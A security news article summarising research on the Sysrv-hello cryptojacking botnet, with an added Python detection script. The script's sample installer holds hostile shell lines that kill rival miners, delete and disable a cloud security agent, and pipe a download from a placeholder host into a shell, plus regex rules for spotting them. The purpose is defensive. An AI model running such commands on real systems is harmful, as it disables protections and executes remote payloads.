Cryptojacking botnets are a profitable business, one which can earn millions by secretly stealing the CPUs of infected machines to mine cryptocurrencies.
Recently, the RiskIQ research team described new capabilities of one such botnet, Sysrv-hello.
The Sysrv-hello botnet is a Windows and Linux infection first identified by Alibaba Cloud Security in late December 2020 that exploits multiple vulnerabilities and is deployed via shell scripts.
Like other threat actors, Sysrv-hello’s operators constantly update and change the bot to keep up with their needs. Since 2020, there have been several changes in the shell scripts that install the Sysrv-hello implant and in how its executable gets deployed on host systems.
In their latest analysis, researchers from RiskIQ revealed that the botnet has added new features, such as the ability to use drive-by downloads and two Monero wallets.
This updated version of the botnet is deployed via drive-by downloads from an empty Python iframe:
“In their latest threat intel analysis, RiskIQ researchers have described the botnet’s latest developments, including the use of drive-by downloads and two new Monero wallets,” the researchers wrote.
Operators mostly used shell scripts to install Sysrv-hello packages. The first shell scripting file could kill prior versions of Sysrv and other miners, and, since December 2020, remove Alibaba (aka Aliyun) services.
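The installer behaviour described above (killing rival miners, removing the cloud provider's security services, then staging the payload) is a useful pattern for a defender to hunt in scripts dropped on a host. The following is an added example, not code from the article or from RiskIQ: a small rule-based scanner run over a constructed shell-script fragment. The script text, the miner names and the agent paths in the rules are illustrative assumptions, not indicators taken from the actual Sysrv-hello scripts.

```python
import re
from typing import Dict, List, Set, Tuple

# Constructed sample installer fragment (assumption, not Sysrv-hello's real script).
# It mimics the three behaviours the article describes.
SAMPLE_SCRIPT = """#!/bin/sh
pkill -f xmrig
kill -9 $(pidof minerd)
rm -rf /usr/local/aegis
systemctl disable aliyun.service
curl -s http://placeholder.invalid/ldr.sh | sh
"""

# Each rule is a name plus a regex applied to one line of the script.
# Process and path names below are illustrative assumptions.
RULES: Dict[str, re.Pattern] = {
    # Terminates other cryptominers so the bot has the CPU to itself.
    "kills_competing_miner": re.compile(
        r"\b(pkill|killall|kill\s+-9)\b.*\b(xmrig|minerd|kdevtmpfsi)\b", re.I),
    # Removes or disables a cloud-provider security agent (Aliyun here).
    "removes_cloud_agent": re.compile(
        r"\b(rm\s+-rf|systemctl\s+(disable|stop)|chkconfig)\b.*\b(aegis|aliyun)\b", re.I),
    # Fetches a remote script and pipes it straight into a shell.
    "downloads_and_runs": re.compile(
        r"\b(curl|wget)\b.*\|\s*(sh|bash)\b", re.I),
}


def scan_script(text: str) -> List[Tuple[int, str, str]]:
    """Return (line number, rule name, stripped line) for every rule hit."""
    hits: List[Tuple[int, str, str]] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern in RULES.items():
            if pattern.search(line):
                hits.append((lineno, name, line.strip()))
    return hits


def triggered_rules(text: str) -> Set[str]:
    """Distinct rule names that fired; several firing together is the signal."""
    return {name for _, name, _ in scan_script(text)}


if __name__ == "__main__":
    for lineno, name, line in scan_script(SAMPLE_SCRIPT):
        print(f"line {lineno}: {name}: {line}")
    print("triggered:", sorted(triggered_rules(SAMPLE_SCRIPT)))
```

A single rule firing is weak evidence (administrators also kill processes and disable services); the combination of all three in one short script is what warrants escalating the file for analysis.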
There were additional files, which researchers didn’t manage to examine closely. But three out of the five additional files were flagged as Linux Coinminers on VirusTotal.
Recently, RiskIQ identified two more files that used extensive shell scripts on known Sysrv-hello servers:
“In April 2021, RiskIQ identified two more files on known Sysrv-hello C2 servers with much more extensive shell scripts than any previously observed; both used a wallet that had never been reported in open source.”
The scripting files RiskIQ obtained contain both a Sysrv IP reported on by Juniper Networks, and a WatchDog domain reported on by Palo Alto. But researchers could not determine if there is any relationship between these two IOCs.
A full technical analysis is available on Sysrv-hello’s website.